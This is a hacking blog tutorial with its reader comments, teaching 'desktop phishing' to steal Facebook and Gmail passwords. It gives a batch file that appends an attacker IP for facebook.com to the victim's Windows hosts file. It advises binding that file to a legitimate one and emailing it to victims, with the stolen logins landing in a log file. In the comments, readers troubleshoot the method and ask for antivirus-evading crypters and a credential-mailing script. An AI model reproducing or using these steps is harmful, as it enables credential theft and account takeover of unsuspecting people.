Desktop Phishing is another advanced type of Phishing attack, In my previous post Desktop Phishing -Introduction i explained the idea and working behind this phishing attack, In this article i will explain how you can use this method to hack Facebook book , Gmail accounts .
This phishing attack is a bit advanced and if your a newbie i would recommend you to read the following articles first
Concept Behind The Hack :
Hosts file is a computer file used in an operating system to map host names to IP addresses. Host file used to play a large role before the Domain Name System (DNS) came into existence. A hosts file basically controls how your browser finds websites.
You can use host file to map any word or domain to an ip address or to another domain. For example if we add
74.125.236.84 www.facebook.com
To the host file what will happen is that when you type Facebook.com in your browser it will open google.com instead of facebook.com this is because (74.125.236.84) is Google's Ip, So the browesr will take it blindly So if a attacker is abel to add his Ip address (where he Hosts the phisher page ) Victim will be redirected to the attackers phishing site
What makes this attack so successful is the victim will not Know since the URL only remains facebook.com
I see many tutorials on the net on Desktop Phishing but Most of the tuts wont't work because of following things
- Now days every one has a dynamic IP address (ip changes every time when you restart )
- Now all most all computers are behind a Router, So we have to port forward our web server in order to access it . This is a little confusing for newbies
But in this tutorial i will explain how you can over come all these problems
How To Over Come This Problem ?
We can overcome the above problems by using a static VPN , With a VPN you will have a static Ip address and you need not port forward your webserver
Demonstration
Things You Require :-
1. Phisher Page - You can download Facebook Phisher page from Here
(I've added an extra page to make it more realistic, the victim will get a message saying Facebook is blocked by your isp)
2. Web server - You can use wamp or xammp , i would recommend you to use xammp, i have written a tutorial on how you can install , use Xammp kindly refer the article for more details
3. A static VPN - I will Use proXPN VPN for this Tutorial but i recommend you to use Strong Open VPN as it is very stable you can download it from Here
Procedure:-
1. First Download and install xampp on your PC, Start Apache and Msql services
2. Download the Facebook Phisher page From the link given above, Place all its contents in the ht docs folder which should be under Xammp (place were you installed xampp)
3. Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn)
4. Now we have to replace some text in the victims Host file which is at C:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job
@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
Replace "172.X.XX.X.X" with your IP (vpn ) address, Finally save it as Save it as Something.bat
5. Now to avoid suspicion you can Bind the batch file with a legitimate file, Kindly refer the Binders tutorial for more info
6. Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters facebook.com He will be redirected to our Phisher Page, But the URL will remain as Facebook.com
To see all the victims credentials and Password open newly created log.txt file which is under ht docs folder
Hope you liked the Tutorial ,For further Doubts and clarifications please pass your comments
plss....hGive Me a link to download ProXpn VPN...
REPLY@Anonymous
http://proxpn.com/
sir...it's not working....plzz show a video tutorial...
REPLYwow
REPLY!!!!
thanx!!1
i will be soon called a hacker...i am making some more tricks of my own!!
old method(mac)
REPLYhey first fix the virus problem for every exe file u upload I think u inturn using the same hacking tricks to gain our info so please dont do that and upload files correctly and for money u r getting from Google adsense and other more i guess so no virus please and post this comment for well be others aware
REPLY@Anonymous
The comment makes me laugh , U dont know what ur doing every software here will be detected as virus because they are hacking programs, this is the VERY first comment like this in my blog and i am not using google ads ..do u see google ads in my blog do u think i am earning using this blog ?....... i think u should be 13 -15 year old kid and a dumb one to, nothing personal but ur comment makes me very angry ,
before commenting do some research and also use ur brain do u see any exe files provided in this post :) that should answer u >>>>>>>>
If u have the guds why the hell did u post as anonymous i am not coward like u >>>>>>thats why i posted this >>> my readers know it >>>>>>>>>>>>>>
If u don't like the programs provided by me don't download them i never asked u to download it did i ??>>> >>>>>>>>>>>>
sir. .if we want to set d "hosts" file of d victim back to default. .so dat he doesnt get suspicious or sumthing. .can u suggest sumthing??
REPLY@Anonymous
Ya U CAN, SEND Another hosts file which is empty>> i mean no re directions >> u can do this by packing host file as sfx archive >>basically a winrar file, but when clicked will extract its contents to a predefined >>directory , so u can define directory i.e (C:\windows\system32\drivers\etc\hosts)when ur packing the file
does this technique still working for FB?i mean other phishing techniques won't work nowadays..
REPLYChandan
REPLYHi , John i want to know that , when the victm enter the facebook url in his browser , then according to you he should be redirectd to My IP (172.x.x.x) address , but its not redirecting to it (error says -> could not connect to 172.x.x.x ) in browser
Does i have to do any settings in "xammp" server.
( But Great thing is that this trick when i simply edit host file on LAN (local network) b/w two PC's the browser is redirecting correctly ,Although its not related to hacking)
But , when use WAN (internet) its reults into browser error.
Can you Please Reply somthing about this ,,, ,,,,?
@Chandan
Did u use a vpn >>> ??
in facebook ,username and password is not able to trace it remains empty but in gmail it is workin can u give any trick or idea for facebook ...
REPLYChandan
REPLYyes jhon , i used Proxpn vpn and have static ip's like (173.0.5.185)
i have done exactly as you posted , then i started services of xammp,(i.e Apache , Mysql ) , but when the victm enter the facebook.com (or ip :- 173.0.5.185) url in his browser , then he gets an error message in browser (i.e could not connect to 173.0.5.185).....,its not redirecting it to my htdocs -> index.html
Can you please suggest me any thing......?
C:\windows\system32\drivers\etc\hosts folder is not accessible error cum...
REPLYThank you for providing wonderful information.
REPLY@Anonymous
If you are using windows 7, Open Hosts file using Notepad with admin privileges
@Jon
Thanks
dude ur gr8!!!fabb hatts off 2 u maan
REPLYhow to send .bat file via msg on fb
REPLYCould U Make a Video Tutorial. Thanks in Advance
REPLYwe need to use any web hosting???
REPLYgreat i like it but dear john can u give us a video tutorial please
REPLYi fink this tut is gr8, tho looks a bit complicated but i am not new to programming and as a young programmer, everything wouldbe challenging till you do it..
REPLYa vid tut will also be helpful Admin.
Also i would love if you could write a php mail to inbox script for me, because i want to take username/password and want the php script send it to my email inbox. i m thinking it could be like this
pls let me know or if there is anything that is wrong...
I m sorry if code is not allowed on ur comment box but i guess its a way i could get to communicate with u (admin)
thanks in advance, please email me back at onesmith2003@gmail.com
Hello John(Admin)
REPLYThank you for approving my comment, still waitin to get an email from you regardin the little request i made about the phpcode.. plsssssssss
everything worked fine but the log file was not created !!
REPLYwhat went wrong ????
@smith
Sorry for the late reply i never received any mail from you please resend them to john@101hacker.com
I'm sorry im a little bit confused..
REPLYdo i have to replace the entire text inside the hosts file with this?
@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
and change the ip with my ip? then save it as .bat file?
and what des echo off means?
i'm so lost.. i'm really confused :\
Friend i have a problem for which i have been searching for so long but didn't get any solution so far. Can you tell me is it possible to redirect the victim to the original facebook so that second time he logs in successfully even though we have poisoned his host file in desktop phishing?I tried a script which works fine and redirects to normal facebook after phishing is done but while doing desktop phishing,it lands victim to the phished page only again and again after he enters his credentials . Any solution to this problem? And can you suggest me some really working FUD crypter which can protect the exe to poison host file from Anti Viruses?They usually spoil the fun by detecting and removing the changes made into host file of the victim. Please do reply. I have been knocking at the door of everyone from so long with this problem but so far no solution
REPLYerr....john i am unable to find host file in windows 7 ultimate.....there r 2 diffnt files... which 1 2 edit??
REPLYhelp i accedentally execute it to my computer. is there any solution because i cant log in to facebook page "Firefox can't establish a connection to the server at www.facebook.com."
REPLY@thin man
Remove the "172.xx.xx.xx www.facebook.com" Line from hosts file which is at C:\windows\system32\drivers\etc\hosts , Use notepad to open the file hope this helps
thanks john. i fixed it already. i renamed the hosts file as hosts.bak then edit the hosts.txt to its default setting. btw does this phisher page never let the victim to log in, unless he fix the hosts file?
REPLYplease help.
REPLYI am really thankful to u for providing such a wonderful step by step tutorial. but iam stuck at the "C:\windows\system32\drivers\etc\hosts ". in host iam having this
>># Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
>>
My confusion is, where should i input the IP i have obtained from proXPN software. and then what saved file should i send to victim in order to get the final LOG file in my pc?
Thank you in advance.. awaiting for your response admin
I cant get the xampp website to look like the fake Facebook... Some help please?
REPLYin my own case, it will not create a log.txt file, why is this so?
REPLYI made it all step by step.
John I just wanna ask you that it would be necessary for me to my pc on 24/7 as it would now be acting as a server?
REPLY@mubeen khan
Yes if you run it 24/7 it will be acting as a server
The apache wont start running in my xampp
REPLYplease help
@Samuel Skoog
Try re installing them
Hey jhon thanx for ths wounderful tutorial.
REPLYI am little confuse my question is can may i use ip of no-ip.com?
@aSiF FaRiD
Yes, you can use an Ip from NoIp.com. But make sure its configured properly
Use the form below to comment. No spam please!!!